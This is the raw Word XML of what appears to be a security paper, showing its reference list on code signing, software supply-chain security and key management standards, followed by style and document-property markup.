        <w:t>[5]  S. Josefsson and I. Liusvaara, "Edwards-Curve Digital Signature Algorithm (EdDSA)," IETF RFC 8032, Jan. 2017.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[6]  National Institute of Standards and Technology, "Digital Signature Standard (DSS)," FIPS PUB 186-5, Feb. 2023.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[7]  A. Rundgren, B. Jordan and S. Erdtman, "JSON Canonicalization Scheme (JCS)," IETF RFC 8785, Jun. 2020.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[8]  E. Rescorla, "The Transport Layer Security (TLS) Protocol Version 1.3," IETF RFC 8446, Aug. 2018.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[9]  M. Souppaya, K. Scarfone and D. Dodson, "Secure Software Development Framework (SSDF) Version 1.1," NIST SP 800-218, Feb. 2022.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[10]  Open Source Security Foundation, "Supply-chain Levels for Software Artifacts (SLSA) Specification v1.0," Apr. 2023. [Online]. Available: https://slsa.dev/spec/v1.0/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[11]  A. Shostack, Threat Modeling: Designing for Security. Indianapolis, IN, USA: Wiley, 2014.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[12]  Executive Office of the President, "Executive Order 14028: Improving the Nation's Cybersecurity," Federal Register, vol. 86, no. 93, May 12, 2021.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[13]  Cybersecurity and Infrastructure Security Agency, "Emergency Directive 21-01: Mitigate SolarWinds Orion Code Compromise," Dec. 2020.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[14]  Z. Newman, J. S. Meyers and S. Torres-Arias, "Sigstore: Software Signing for Everybody," in Proc. ACM SIGSAC Conf. Computer and Communications Security (CCS), 2022, pp. 2353-2367.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[15]  J. Samuel, N. Mathewson, J. Cappos and R. Dingledine, "Survivable Key Compromise in Software Update Systems," in Proc. 17th ACM Conf. Computer and Communications Security (CCS), 2010, pp. 61-72.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[16]  E. Barker, "Recommendation for Key Management: Part 1 - General," NIST SP 800-57 Part 1 Rev. 5, May 2020.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[17]  Python Cryptographic Authority, "cryptography" library documentation. [Online]. Available: https://cryptography.io/</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006E7149" w:rsidRPr="00F416E0">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75A2" w14:textId="77777777" w:rsidR="0041753F" w:rsidRDefault="0041753F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="55C1F631" w14:textId="77777777" w:rsidR="0041753F" w:rsidRDefault="00417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68171"/>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="4C8B42BF" w14:textId="77777777" w:rsidR="006E7149" w:rsidRDefault="005E06C9">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E71C43">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="158C8104" w14:textId="77777777" w:rsidR="006E7149" w:rsidRDefault="006E7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5053" w14:textId="77777777" w:rsidR="0041753F" w:rsidRDefault="0041753F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="55C10634" w14:textId="77777777" w:rsidR="0041753F" w:rsidRDefault="00417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0C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="398D1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num w:numId="1" w16cid:durableId="1282498087">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D66523C"/>
    <w:rsid w:val="00064D5F"/>
    <w:rsid w:val="00212ECC"/>
    <w:rsid w:val="00221CB0"/>
    <w:rsid w:val="0041753F"/>
    <w:rsid w:val="005A47F1"/>
    <w:rsid w:val="005E06C9"/>
    <w:rsid w:val="006B1CDA"/>
    <w:rsid w:val="006E7149"/>
    <w:rsid w:val="00820749"/>
    <w:rsid w:val="0084757B"/>
    <w:rsid w:val="00E71C43"/>
    <w:rsid w:val="00F218A3"/>
    <w:rsid w:val="00F416E0"/>
    <w:rsid w:val="ED665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582F1"/>
  <w15:docId w15:val="{1DD9BAA4-1C83-47E0-80B4-FDB0DBF2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513"/>
        <w:tab w:val="right" w:pos="9026"/>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E71C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71C43"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:kern w:val="2"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="en-US"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:rsid w:val="00F416E0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:rsid w:val="00F416E0"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="360" w:after="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="160" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>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140</Words>
  <Characters>800</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>6</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Hewlett-Packard</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WPS_1744696111</dc:creator>
  <cp:lastModifiedBy>FACULTY 3</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-15T10:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-08T06:23:00Z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3D23D10EC35AA670B430EF684744DDAA_41</vt:lpwstr>
  </property>
</Properties>
</file>